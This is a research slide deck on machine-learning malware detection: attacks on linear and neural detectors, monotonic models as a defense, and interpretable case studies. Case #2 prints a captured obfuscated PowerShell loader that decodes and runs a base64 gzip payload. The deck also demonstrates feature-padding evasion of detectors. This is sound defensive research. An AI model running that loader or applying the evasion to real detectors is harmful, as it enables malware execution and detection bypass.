Detection is not a classification: reviewing machine learning techniques for cybersecurity specifics
Alexander Chistyakov
Research-Developer, Kaspersky Lab
Presentation plan [short]
1. Construct a powerful ML-based malware detector
2. Hack it and avoid the detection
3. Construct the new one and make it invulnerable
Presentation plan [detailed]
1. ML in cybersecurity: basic pipeline overview
2. Issues in classical ML detectors
• White box and black box attacks
• Suffering with false alarms
• Real-time detection problem
• Unclear reasons for detection
3. Reviewing the basis: constructing secure ML detectors
• Providing the invulnerability to the model
• Effective update of the model’s formula using false positives
• Effective and interpretable detection in the real-time mode
And also: discoveries, demonstrations and a bit of math ...
Basic detection pipeline with machine learning
In-lab training stage:
1. Collect training data
2. Provide labels to samples
3. Extract features from samples
4. Select classifier’s architecture
5. Train selected model
6. Set up detection thresholds
In-product testing stage:
1. Take new item (test data)
2. Predict test item’s label
3. Labeled as malware?
• YES: malicious file, raise an alarm
• NO: benign file, check next file
Vulnerabilities in classical machine learning
Malicious behavior detection
Pros:
1. Processing of fileless threats
2. Hard to obfuscate
3. Detection of attacks based on benign software
Cons:
1. High risk for the system when analyzing a malicious sample
2. Risk of missing hidden channels
3. Possible performance degradation
Why «machine learning»?
1. Thousands of samples per day
2. Hundreds / thousands of events per sample
3. Complex dependencies matter
ProcessStart(0)
LoadLibrary("c:\windows\system32\0c990d93e8c77d7549b1cf3d2.exe")
LoadLibrary("c:\windows\system32\ntdll.dll")
LoadLibrary("c:\windows\system32\kernel32.dll")
LoadLibrary("c:\windows\system32\kernelbase.dll")
LoadLibrary("c:\windows\system32\winmm.dll")
CreateThreadLocal(3471)
LoadLibrary("c:\windows\system32\shell32.dll")
LoadLibrary("c:\windows\system32\shlwapi.dll")
LoadLibrary("c:\windows\system32\wshtcpip.dll")
LoadLibrary("c:\windows\system32\wshqos.dll")
RegCreateKey("hklm\system\controlset001\services\tcpip\parameters")
RegCreateKey("hklm\software\microsoft\systemcertificates\trust")
RegCreateKey("hkcu\software\microsoft\systemcertificates\ca")
LoadLibrary("c:\windows\system32\iphlpapi.dll")
LoadLibrary("c:\windows\system32\crypt32.dll")
CreateThreadLocal(2920)
RegCreateKey("hkcu\software\microsoft\systemcertificates\my")
ModifyFile("c:\program files\7-zip\7zcon.sfx")
RenameFile("c:\program files\7-zip\7zcon.sfx",
"c:\program files\7-zip\7zcon.sfx.xoxoxo")
CreateFile("c:\program files\7-zip\history.txt",[48495344F59206F66])
ModifyFile("c:\program files\7-zip\history.txt")
ModifyFile("c:\python26\lib\idlelib\credits.txt.xoxoxo")
RenameFile("c:\python26\lib\idlelib\credits.txt.xoxoxo",
"c:\python26\lib\idlelib\credits.txt")
FileModified("c:\program files\ida\cfg\dsp563xx.cfg.xoxoxo")
RenameFile("c:\program files\ida\cfg\dsp563xx.cfg.xoxoxo",
"c:\program files\ida\cfg\dsp563xx.cfg")
...
Linear models
[Diagram: input features → linear transformation → model’s output]
Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT
Feature values: 10, 3, 1, 0, 1, 0, 1
Linear transformation: 2.47; model’s output: 0.922 (malicious file)
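The two numbers on this slide are consistent with a logistic (sigmoid) output: a linear score of 2.47 maps to roughly 0.922. The sketch below shows that scoring step. The sigmoid output is an assumption inferred from the numbers, and the weights are hypothetical, since the slides do not list them.

```python
import math

# Feature order as listed on the slide.
FEATURES = ["load_library", "create_file", "inject_to_process",
            "modify_service", "create_service", "modify_registry", "bias"]

def sigmoid(z: float) -> float:
    """Map a real-valued score to the (0, 1) interval."""
    return 1.0 / (1.0 + math.exp(-z))

def linear_score(weights, counts):
    """Weighted sum of event counts (the 'linear transformation')."""
    return sum(w * x for w, x in zip(weights, counts))

# Hypothetical weights, chosen only for illustration (not from the slides).
weights = [0.05, -0.03, 2.0, 1.0, 1.5, 0.5, -1.5]
counts = [10, 3, 1, 0, 1, 0, 1]  # feature values shown on the slide

z = linear_score(weights, counts)
p = sigmoid(z)
verdict = "malicious" if p >= 0.5 else "benign"
print(f"score={z:.2f} output={p:.3f} verdict={verdict}")

# The slide's own numbers: a score of 2.47 gives an output of about 0.922.
print(round(sigmoid(2.47), 3))
```

The 0.5 cut-off used here is also an assumption; in the pipeline above the detection threshold is set separately.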
Linear models
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
[Diagram: same input features and values (10, 3, 1, 0, 1, 0, 1); linear transformation: 2.47; model’s output: 0.922 (malicious file)]
Linear models
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
EASY TO HACK
[Diagram: same input features, with one event count raised to 200 (remaining feature values: 10, 1, 0, 1, 0, 1); linear transformation: -3.62; model’s output: 0.027 (benign file)]
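Why a plain linear model is easy to hack can be shown in a few lines: if any weight is negative, repeating the corresponding harmless event pushes the score down without removing the malicious behavior. This is a toy illustration with hypothetical weights, not the model from the slides.

```python
import math

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))

def output(weights, counts):
    """Sigmoid of the weighted sum of event counts."""
    return sigmoid(sum(w * x for w, x in zip(weights, counts)))

# Order: load_library, create_file, inject_to_process, modify_service,
#        create_service, modify_registry, bias.
# Hypothetical weights; note the negative weight on create_file.
weights = [0.05, -0.03, 2.0, 1.0, 1.5, 0.5, -1.5]

original = [10, 3, 1, 0, 1, 0, 1]
# Same malicious behavior, padded with 197 extra file creations.
padded = [10, 200, 1, 0, 1, 0, 1]

before = output(weights, original)
after = output(weights, padded)
print(f"before padding: {before:.3f}")
print(f"after padding:  {after:.3f}")
```

The injection and service events are still present in the padded sample; only the count of a negatively weighted event changed.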
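Neural network
[Diagram: input features → linear transformation → hidden layer → linear transformation → model’s output]
Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT
Feature values: 10, 3, 1, 0, 1, 0, 1
Hidden layer: 3.29, -4.3, 0.13 (plus a constant 1)
Linear transformation: 2.54; model’s output: 0.927 (malicious file)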
Neural networks
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER ARCHITECTURES
GOOD PERFORMANCE AND DETECTION QUALITY
[Diagram: same network and input (feature values 10, 3, 1, 0, 1, 0, 1); hidden layer: 3.29, -4.3, 0.13 (plus a constant 1); linear transformation: 2.54; model’s output: 0.927 (malicious file)]
Neural networks
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER ARCHITECTURES
GOOD PERFORMANCE AND DETECTION QUALITY
STILL HACKABLE
[Diagram: same network, with two event counts raised to 12 and 17 (remaining feature values: 10, 1, 0, 1, 1); hidden layer: 1.17, -2.3, 0.61 (plus a constant 1); linear transformation: -2.47; model’s output: 0.078 (benign file)]
Advanced black-box attacks setup
No access to model’s weights…
… or architecture …
… or output scores
Just train your own model on the victim’s detections,
then hack that model to bypass the target detector
Behavior neural network detection quality
Dynamic classification issue [DEMO: Trojan.Win32.BitMiner]
Dynamic classification issue [DEMO: Google Chrome]
Dynamic classification issue [DEMO: Google Chrome]
FALSE ALARM
False alarms issue
[Figure label: False alarm]
Malware detection is an undecidable problem.
Therefore, we will always have some mistakes.
False alarms issue
1. Create a white list:
+ fast
- need to choose a radius
- loss of detections
- complex surface
- unlimited growth of memory
2. Retrain the model:
+ same memory usage
- time-consuming
- loss of detections
Key issues of machine learning:
1. Models are unstable
2. Hard to fix errors
3. Hard to interpret
4. Models are vulnerable
Constructing secure machine learning detectors
No malicious code can become clean
through the injection
of any new functionality
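One way to write this requirement down is as monotonicity of the detector’s score. The notation below is an assumption made for illustration: x and x' are vectors of nonnegative event counts, f is the model’s score, and the comparison between vectors is componentwise.

```latex
% Adding behavior never lowers the score:
x \le x' \;\Longrightarrow\; f(x) \le f(x')

% For a linear model with a nondecreasing output function \sigma,
% nonnegative weights are sufficient:
f(x) = \sigma\!\left(w^{\top} x + b\right), \qquad w_i \ge 0 \ \text{for all } i
```

Under this condition a sample that is already above the detection threshold stays above it no matter which extra events are appended.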
Secure linear models
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
[Diagram: input features LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; feature values: 10, 3, 1, 0, 1, 0, 1; linear transformation: 2.47; model’s output: 0.922 (malicious file)]
Secure linear models
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
[Diagram: same input features, with one event count raised to 200 (remaining feature values as shown: 10, 0, 0, 1, 0, 1); linear transformation: 2.68; model’s output: 0.935 (malicious file)]
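A minimal sketch of how nonnegative weights could be enforced in a linear model: plain logistic regression trained by stochastic gradient descent, with every weight clipped back to zero after each step (projected gradient descent). The training procedure, the toy data, and the three-feature layout are assumptions for illustration; the slides only state the constraint itself.

```python
import math

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))

def predict(w, b, x):
    """Model output for event counts x; the bias b is unconstrained."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)

def train_nonnegative(X, y, lr=0.05, epochs=300):
    """Logistic regression with weights projected onto w >= 0 after each step."""
    w = [0.0] * len(X[0])
    b = 0.0
    for _ in range(epochs):
        for x, target in zip(X, y):
            err = predict(w, b, x) - target
            # Gradient step followed by projection: negative weights become 0.
            w = [max(0.0, wi - lr * err * xi) for wi, xi in zip(w, x)]
            b -= lr * err
    return w, b

# Toy data (hypothetical). Columns: load_library, create_file, inject_to_process.
X = [[10, 3, 1], [4, 0, 1], [12, 5, 0], [3, 40, 0]]
y = [1, 1, 0, 0]

w, b = train_nonnegative(X, y)

base = [10, 3, 1]
padded = [10, 200, 1]  # same behavior plus many extra file creations
print("weights:", [round(wi, 3) for wi in w])
print("base:", round(predict(w, b, base), 3),
      "padded:", round(predict(w, b, padded), 3))
```

Because no weight can be negative, the padded sample can never score below the original one, whatever the trained values turn out to be. The price is that events typical of benign software cannot lower the score either.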
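Secure neural networks
MONOTONIC ACTIVATION FUNCTIONS
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
[Diagram: input features LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; feature values: 10, 3, 1, 0, 1, 0, 1; hidden layer: 0.29, 1.34, 0.13 (plus a constant 1); linear transformation: 2.47; model’s output: 0.922 (malicious file)]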
Secure neural networks
MONOTONIC ACTIVATION FUNCTIONS
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
MIN-MAX POOLING OUTPUT LAYER
K-LAYERS ARCHITECTURE FOR K-DIMENSIONAL DATA
[Diagram: input features LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; feature values: 10, 3, 1, 0, 1, 0, 1; intermediate values as shown: 5.02, 3.29, 2.47, 2.47, 0.17, 1.26, 7.31, 0.17, -1.2, 0.19, 7.66, -1.2; linear transformation: 2.47; model’s output: 0.922 (malicious file)]
Daniels, Hennie, and Marina Velikova. "Monotone and partially monotone neural networks."
IEEE Transactions on Neural Networks 21.6 (2010): 906-917.
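The intermediate values on this slide are consistent with taking the minimum inside each group of three units (2.47, 0.17, -1.2) and then the maximum across groups (2.47). The sketch below builds a small network of that shape: linear units with nonnegative weights, a min within each group, a max across groups, and a sigmoid output. It is an illustration under those assumptions, with random hypothetical weights, and is not claimed to be the exact architecture of the cited paper or of the product.

```python
import math
import random

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))

def min_max_pool(groups):
    """Minimum inside each group, then maximum across groups."""
    return max(min(group) for group in groups)

def make_monotone_net(n_inputs, n_groups, units_per_group, seed=0):
    """Random network: every unit is (nonnegative weights, free bias)."""
    rng = random.Random(seed)
    return [[([rng.uniform(0.0, 1.0) for _ in range(n_inputs)],
              rng.uniform(-2.0, 2.0))
             for _ in range(units_per_group)]
            for _ in range(n_groups)]

def forward(net, x):
    """Each stage is nondecreasing in x, so the whole network is monotone."""
    groups = [[sum(w * xi for w, xi in zip(weights, x)) + bias
               for weights, bias in group]
              for group in net]
    return sigmoid(min_max_pool(groups))

# The slide's intermediate values, grouped three at a time.
slide_groups = [[5.02, 3.29, 2.47], [0.17, 1.26, 7.31], [-1.2, 0.19, 7.66]]
print(min_max_pool(slide_groups))

net = make_monotone_net(n_inputs=6, n_groups=3, units_per_group=3)
x = [10, 3, 1, 0, 1, 0]
x_more = [10, 200, 1, 0, 1, 5]  # extra events appended
print(forward(net, x) <= forward(net, x_more))
```

Unlike a single linear unit, the min and max stages let the network represent nonlinear decision surfaces while keeping the monotonicity guarantee.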
Secure neural networks
…
ModifyFile("notepad.exe")
CreateFile("config.xml",0644)
CreateFile("doc1.rtf",0755)
ModifyFile("doc1.rtf")
ModifyFile("doc1.rtf")
CreateFile("list.rtf",0755)
ModifyFile("list.rtf")
ModifyFile("config.xml")
ModifyFile("doc1.rtf")
DeleteFile("doc1.rtf")
DeleteFile("list.rtf")
…
[Diagram: the event log shown as a graph linking event types (CreateFile, ModifyFile, DeleteFile) with their arguments (list.rtf, notepad.exe, config.xml, doc1.rtf, 0644, 0755); input features: CREATE FILE, MODIFY FILE, DELETE FILE, DNS REQUEST, BIAS CONSTANT; feature values: 4, 4, 2, 0, 1; linear transformation: 2.47; model’s output: 0.922 (malicious file)]
Detection with monotonic models [DEMO: Trojan.Win32.BitMiner]
Detection with monotonic models [DEMO: Google Chrome]
Secure decision trees
[Figure: feature plane with axes Cα (0 to 80) and Cβ (0 to 24), partitioned by a decision tree. Root split: Cβ > 12; second-level splits: Cα > 70 and Cα > 12 (Cα > 20 on the following slide); leaves: Malicious file, Benign file, Benign file, Malicious file]
Secure decision trees
[Figure: same axes, Cα (0 to 80) and Cβ (0 to 24). Root split: Cα > 40; second-level splits: Cβ > 6 and Cβ > 12; leaves: Benign file, Suspicious file (25%), Suspicious file (50%), Malicious file]
NOT MONOTONIC
Secure decision trees
[Figure: same axes, Cα (0 to 80) and Cβ (0 to 24). Root split: Cα > 40; splits Cβ > 6 and Cβ > 12 appear in both branches; leaves: Malicious file, Suspicious file (60%), Suspicious file (33%), and three Benign file leaves]
Potharst, Rob, and Adrianus Johannes Feelders. "Classification
trees for problems with monotonicity constraints." ACM SIGKDD
Explorations Newsletter 4.1 (2002): 1-10.
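Whether a given tree is monotonic can be checked mechanically: evaluate it on a grid and look for pairs of points where more activity yields a lower score. The two trees below are hypothetical examples built from the same kind of splits (Cα > 40, Cβ > 6, Cβ > 12); their leaf values are assumptions and do not reproduce the slides’ exact trees. This is only a checker, not the tree-building algorithm from the cited paper.

```python
from itertools import product

def non_monotone_tree(c_alpha, c_beta):
    """Hypothetical tree: the right branch has a leaf lower than the left one."""
    if c_alpha > 40:
        return 1.0 if c_beta > 12 else 0.25
    return 0.5 if c_beta > 6 else 0.0

def monotone_tree(c_alpha, c_beta):
    """Hypothetical repaired tree: both Cβ splits appear in both branches."""
    if c_alpha > 40:
        if c_beta > 12:
            return 1.0
        return 0.5 if c_beta > 6 else 0.25
    if c_beta > 12:
        return 0.5
    return 0.25 if c_beta > 6 else 0.0

def find_violations(tree, alphas, betas):
    """Pairs (p, q) with p <= q componentwise but tree(p) > tree(q)."""
    points = list(product(alphas, betas))
    return [(p, q) for p in points for q in points
            if p[0] <= q[0] and p[1] <= q[1] and tree(*p) > tree(*q)]

# Grid matching the axis ticks on the slides.
ALPHAS = [0, 20, 40, 60, 80]
BETAS = [0, 6, 12, 18, 24]

bad = find_violations(non_monotone_tree, ALPHAS, BETAS)
good = find_violations(monotone_tree, ALPHAS, BETAS)
print(len(bad), "violations in the first tree, e.g.", bad[0])
print(len(good), "violations in the repaired tree")
```

A grid check only covers the sampled points, so the grid should include values on both sides of every split threshold, as it does here.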
Monotonic models toolbox
1. Artificial neural networks
• Dropout
• Batch / Weight normalization
• Min / Max / Average-pooling layers
• Autoencoders
• Recurrent networks
2. Decision trees
3. Classification ensembles
• Random forest
• AdaBoost
• Gradient boosting (including XGBoost)
4. Kernel-SVM
5. Nonparametric methods
• k-NN
• Parzen-window density estimator
6. …
Fixing false alarms in the monotonic space
1. Detect a problem with false positives
2. Identify the area of benign behavior
3. Join the benign area boundary with your model’s decision rule
[Figure labels: False alarm; FA fixing rules]
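One possible reading of these three steps, sketched under stated assumptions: in a monotonic space, if a sample is confirmed benign, every sample with componentwise fewer or equal events can be treated as benign too, so the fix is to carve that region out of the detection area. The class, the scoring function, and the threshold below are hypothetical and are not taken from the slides.

```python
def dominated_by(x, ref):
    """True if x has no more of any event than the reference point."""
    return all(xi <= ri for xi, ri in zip(x, ref))

class PatchedDetector:
    """Wraps a monotone score with a list of confirmed-benign points."""

    def __init__(self, score_fn, threshold):
        self.score_fn = score_fn
        self.threshold = threshold
        self.benign_points = []

    def add_false_alarm(self, x):
        """Step 2: record the benign area as everything below x."""
        self.benign_points.append(tuple(x))

    def is_malicious(self, x):
        """Step 3: the benign area overrides the model's decision rule."""
        if any(dominated_by(x, ref) for ref in self.benign_points):
            return False
        return self.score_fn(x) >= self.threshold

# Hypothetical monotone score over (load_library, create_file, inject) counts.
def score(x):
    return x[0] + 5 * x[1] + 20 * x[2]

detector = PatchedDetector(score, threshold=30)
false_alarm = (25, 2, 0)

print(detector.is_malicious(false_alarm))  # step 1: flagged before the fix
detector.add_false_alarm(false_alarm)
print(detector.is_malicious(false_alarm))  # no longer flagged
print(detector.is_malicious((25, 2, 1)))   # one injection on top: still flagged
```

The patched rule stays monotonic: a sample outside the benign area can only move further from it as events are added, so existing detections above the false alarm are kept.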
Model’s output interpretation
Case #1: Trojan.Win32.BitMiner
More than 200K users affected
Score | Event
------------------------------------------------------------------------------------------------------------
2.734 | RegCreateKey("$hklmsoftwareminergateorganizationdefaultsminersmro")
2.737 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","visible","true")
4.238 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","pool","xmr.pool.minergate.com:45560")
Score | Event
-------------------------------------------------
-2.083 | RegCreateKey("$hklmsystemcontrolset001
| servicesdirectx11b")
-2.083 | RegSetValue("$hklmsystemcontrolset001
| servicesdirectx11b","imagepath",
| ""$appdataDirectX11bSystem.exe"")
-1.175 | InstallMd5("$appdatadirectx11bsystem.exe",
| 0x4635935FC972C582632BF45C26BFCB0E)
Score | Event
------------------------------------------------------------
-0.077 | WriteProcessMemory("bi16.cmd",0x000000007EFDF368,0,0,8)
-0.077 | ResumeThread("bi16.cmd")
-0.077 | LoadLibrary("$windirregedit.exe")
0.733 | CreateProcess("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
0.734 | CreateProcessInt("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
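The Score | Event tables above pair each logged event with the model’s score at that moment. A minimal sketch of how such a trace could be produced with an additive monotone model follows. The event weights, bias, and threshold are hypothetical; the product’s real model is not described at this level of detail in the slides.

```python
# Hypothetical per-event contributions (all nonnegative) and bias.
EVENT_WEIGHTS = {
    "LoadLibrary": 0.0,
    "RegCreateKey": 0.4,
    "RegSetValue": 0.6,
    "CreateProcess": 0.8,
}
BIAS = -2.0
THRESHOLD = 0.0

def score_trace(events):
    """Running score after each event, as (score, event name) rows."""
    score = BIAS
    trace = []
    for name in events:
        score += EVENT_WEIGHTS.get(name, 0.0)
        trace.append((round(score, 3), name))
    return trace

def first_detection(trace, threshold=THRESHOLD):
    """Index of the first event at which the score reaches the threshold."""
    for index, (score, _) in enumerate(trace):
        if score >= threshold:
            return index
    return None

events = ["LoadLibrary", "RegCreateKey", "RegSetValue",
          "CreateProcess", "RegSetValue", "CreateProcess"]
trace = score_trace(events)

print("Score  | Event")
for score, name in trace:
    print(f"{score:6.3f} | {name}")
print("detected at event index:", first_detection(trace))
```

With nonnegative contributions the running score never decreases, so the event that crosses the threshold, together with the events that raised the score most, serves as the explanation of the detection.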
Case #2: Shellcode execution via powershell
CreateProcess("$system32windowspowershellv1.0powershell.exe",
""powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream( ,
[Convert]::FromBase64String(
'H4sIAKAhylkCA71W62/aSBD/nEr9H6wKCaOjYCdA00iVzk9wwjMG8zpUGXuxN6wf8SOY9Pq/
3yzYCb0mVa4fzkJiHzM7v/nNzM5uUt9KcOAzyB1EnsaP2jbz7f27s6EZmR7Dlrb2NKgypcxoV
s7OYL20vwvnm9kFavck5gvDLoUwlAPPxP7q6kpKowj5yXFea6NEiGPkrQlGMVth/mamLorQx8
H6DlkJ840pfa21SbA2SS62l0zLRcxHwbfpXjewTAqtpocEJ2z5r7/KleVHflVT7lOTxGxZ38c
J8mo2IeUK871CDY73IWLLPWxFQRxsktoU+xfntYkfmxvUh9MeUA8lbmDH5Qo4A78IJWnkM6du
0XOOUmwZhsMosATbjlAMSjXNfwi2iC35KSFV5k92mYO4Tf0Eewj2ExQFoY6iB2yhuNYxfZugW
7RZsX20K3x/qxJ7qgRSwySqVCEqr6PtBXZK0PGAcuVnvIeAVuDLgwo0fH//7v27TZEHJMuC9R
oHPe/xNBFgdLY8jBFgZYdBjA/iXxiuyvTAnJkE0R6mpXGUosqKWdJQLFcroLbVHHHiY/X1I/h
CHqTvv87mjqbA6tIIsL0CrTxUJTs17udfW3Tr9ayT0Qb7SN77poetIrHYl8hHG4IOPtcKsT5A
Y8v5BrJlRJBjJpTHKrP8WU3xcPKkK6aY2CgSLAhgDKggtpUfwRxDw5Y1v4c8IOs4L0MgNpDOq
JDOU3hfWKdzECpLxIzjKjNMoZ6sKqMjkyC7ygh+jPMtIU2Cw7D8DLeXkgRbZpwUx60qJ1TmJq
XAj5MotSCE4P5YD5GFTULZqDIdbCNxr2OnMF1+kQvJJAT7Dpz0ALGAFcqBntDEiABlkQSVmo4
SzQsJ8kDsUN4qMR0o5rwWDslkOsguv4CzyPNjUlNSCjZOUEKkdRIkVcbAUQIXBSU4T6rfxnFy
URSIpAjlwWGLGlqK+4SmfCmzxpe7YKDo8qVAszWn60BOlAAxahR4ohmjVkNPIqCN/VBXsNwcy
sGjAJ+i3o4MUZ8YC61nXxNdS/S5grsT19Uwrzkw308UZ5hw4c143LnW5Y4QyZm7EbRYUzrifs
SLgtXBn4xrcTIBPSx1R3eZJtii58ycubTThu5MA0NS19Ec+Bc11xK5BeeInCp1ddFVMCc4+qg
zavALrX5JRPyoa7rQmT7Ze7KjNBqdWTYW+r1rwVUHtsqfqwf9LdVfbNtdWTnMLTofzWMFK2BH
Uecjw0VTIxSniroYGaHm/LFzRka33lBdEdY1nHVDvQ4fzwMPyVhfNy/MaTNcewYHHE11zXd1a
yONO5Yn1uvGhO9rGKnj6ZbLdgqX7Y0+6AQtw/d8SqswrBst8TDKBvIk7d0Ju+6dkvVxI+vfbY
XpFl/vJn5n141BSuz3LDKenAfyhPNaRsPbZJQqQa7zyJnQUff8liw8lV93Rul81t8h6XO7xxG
vD3xii+JQ55SvCYcbgnzjuAfT4ghwXmeX3cjQG5/qnw2QXdxL5LOGN+p9hw91UxMgDcRrjMR7
EbjR1yF/G7bahQ/gdzbhQ8CXY+QAM+ba7c5DnZ/PBFvva9llW1N2ggC6yqU8c550h/WhLXSji
Pr5IPEBWdd5o78wt6Kpz/3bHdJGwCmYp3notaY3t+PmKPd7gsdHjm2KVcN2CH4IAs0k0G0C11
B5Pn7GOVQ0DfDcND28szXBGqi7zkyfqnfyB1pWUFclF12elMhrHbFnRrFrEigd6HHFVaYGkZq
3rWGAqQbLnjxjtijyEYH2Dw+E4jIQCAks2kJP2xx08WNvXcHVNoHhxfmLowrzJFh5bq3F0tXV
AiDTtnpS/bUu8p3ErXLZBcdBp+SyBgeev91dKQj37A9HVmnHpbT92xQ5mKrQm6iEB/Z0+H/wm
l+DLvzZb+T1ee0Xu2/imqseePhp9ceF/8T3b9IwNXEC8jrc5QQd3xm/ZCNPqJMH2iFikCeb/K
Pv5UGafOzDw+0fYnWge6ULAAA='
));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress
))).ReadToEnd();",0xF7722B62B4014E0C50ADFA9D60CAFA1C)
Case #3: Cryptor
Score | Event
-------------------------------------------------
-2.352 | FileAccessed("$programfiles7-zip7zcon.sfx",
| 00000010110000000010000100100001)
-2.343 | FileModified("$programfiles7-zip7zcon.sfx")
-2.335 | FileRenamed("$programfiles7-zip7zcon.sfx",
| "$programfiles7-zip7zcon.sfx.xoxoxo")
-1.296 | FileCreated("$programfiles7-ziphistory.txt",
| [484953544F5259206F66])
-0.996 | FileAccessed("$programfiles7-ziphistory.txt",
| 00000010110000000010000100100001)
-0.670 | FileModified("$programfiles7-ziphistory.txt")
-0.667 | FileCreated("$programfiles7-ziphistory.txt",
| [CE22AD093C70CD1A5ABC])
-0.653 | FileRenamed("$programfiles7-ziphistory.txt",
| "$programfiles7-ziphistory.txt.xoxoxo")
|
... | ...
|
1.967 | FileAccessed("c:python27license.txt",
| 00000010110000000010000100100001)
3.055 | FileModified("c:python27license.txt")
3.055 | CreateFile("c:python27license.txt",
| [E8FF9047336A051EB2E7])
3.646 | RenameFile("c:python27license.txt",
| "c:python27license.txt.xoxoxo")
... | ...
Case #4: ML detector against a zero-day threat
• In October 2017 we spotted BlackOasis activity. The attack used a Flash zero-day exploit: https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
• After successful exploitation of the vulnerability, the payload is executed
• The attack used a special technique for payload execution:
  • A special service was created
  • The main malware modules were dropped to %programdata%
  • The modules included a legitimate utility, adaptertroubleshooter.exe
  • This utility was used to load the main malware module via DLL hijacking
LET’S TALK?
Kaspersky Lab HQ
39A/3 Leningradskoe Shosse
Moscow, 125212, Russian Federation
Tel: +7 (495) 797-8700
www.kaspersky.com

